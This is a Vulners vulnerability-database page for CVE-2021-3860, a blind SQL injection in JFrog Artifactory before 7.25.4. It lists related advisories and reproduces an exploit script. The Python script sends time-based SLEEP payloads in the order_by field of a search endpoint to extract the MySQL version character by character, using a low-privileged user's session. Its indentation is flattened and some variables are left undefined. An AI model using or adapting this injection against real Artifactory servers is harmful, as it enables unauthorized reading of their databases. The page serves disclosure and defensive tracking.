Vulners
Lucene search
JFrog Artifactory < 7.25.4 - Blind SQL Injection
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | JFrog Artifactory < 7.25.4 - Blind SQL Injection Exploit | 19 Feb 202400:00 | – | zdt |
 | Jfrog JFrog Artifactory SQL注入漏洞 | 20 Dec 202100:00 | – | cnnvd |
 | CVE-2021-3860 | 20 Dec 202100:00 | – | cve |
 | CVE-2021-3860 | 20 Dec 202100:00 | – | cvelist |
 | EUVD-2021-27097 | 7 Oct 202500:30 | – | euvd |
 | CVE-2021-3860 | 20 Dec 202122:15 | – | nvd |
 | BIT-ARTIFACTORY-2021-3860 | 6 Mar 202410:52 | – | osv |
| CVE-2021-3860 | 20 Dec 202122:15 | – | osv |
 | JFrog Artifactory SQL Injection | 19 Feb 202400:00 | – | packetstorm |
 | Sql injection | 20 Dec 202122:15 | – | prion |
10
# Exploit Title: artifactory low-privileged blind sql injection
# Google Dork:
# Date:
# Exploit Author: ardr
# Vendor Homepage:https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Software Link: https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Version: JFrog Artifactory prior to 7.25.4
# Tested on: MySQL
# CVE : CVE-2021-3860
import requests, string, time
from sys import stdout,exit
import warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# written by 75fc58fa86778461771d2ff7f68b28259e97ece9bf6cd8be227c70e6a6140314c97d3fdac30b290c6b10d3679c5ba890635a1ca6fa23c83481dfc1257cd062fd
# old script for CVE-2021-3860
# log into artifactory with any user. there must be populated data in the system. a fresh install will not work.
# you will need to be able to capture a valid request to the below endpoint in order to run this script.
# once captured, replace the cookies and headers below
warnings.simplefilter('ignore',InsecureRequestWarning)
session = requests.session()
base = input("Please enter the base url: ")
url = f"{base}/ui/api/v1/global-search/bundles/received?$no_spinner=true"
# headers = Replace this with captured headers from the above endpoint
pos = 1
# cookies = Replace this with captured cookies from the above endpoint
while True:
for i in string.digits + '.':
data={"after": "", "before": "", "direction": "asc", "name": "*", "num_of_rows": 100, "order_by": f"(select*from(select((CASE WHEN (MID(VERSION(),{pos},1) = '{i}') THEN SLEEP(5) ELSE 4616 END)))a)"}
start = time.time()
r = session.post(url, headers=headers, cookies=cookies, json=data, verify=False)
request_time = time.time() - start
if request_time > 5:
version += i
pos += 1
stdout.write(i)
stdout.flush()
break
if len(version) >= 6:
stdout.write("\n")
print(f"Version found: MySQL {version}")
exit(0)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Feb 2024 00:00Current
8.9High risk
Vulners AI Score8.9
CVSS 26.5
CVSS 3.18.8
EPSS0.00247
SSVC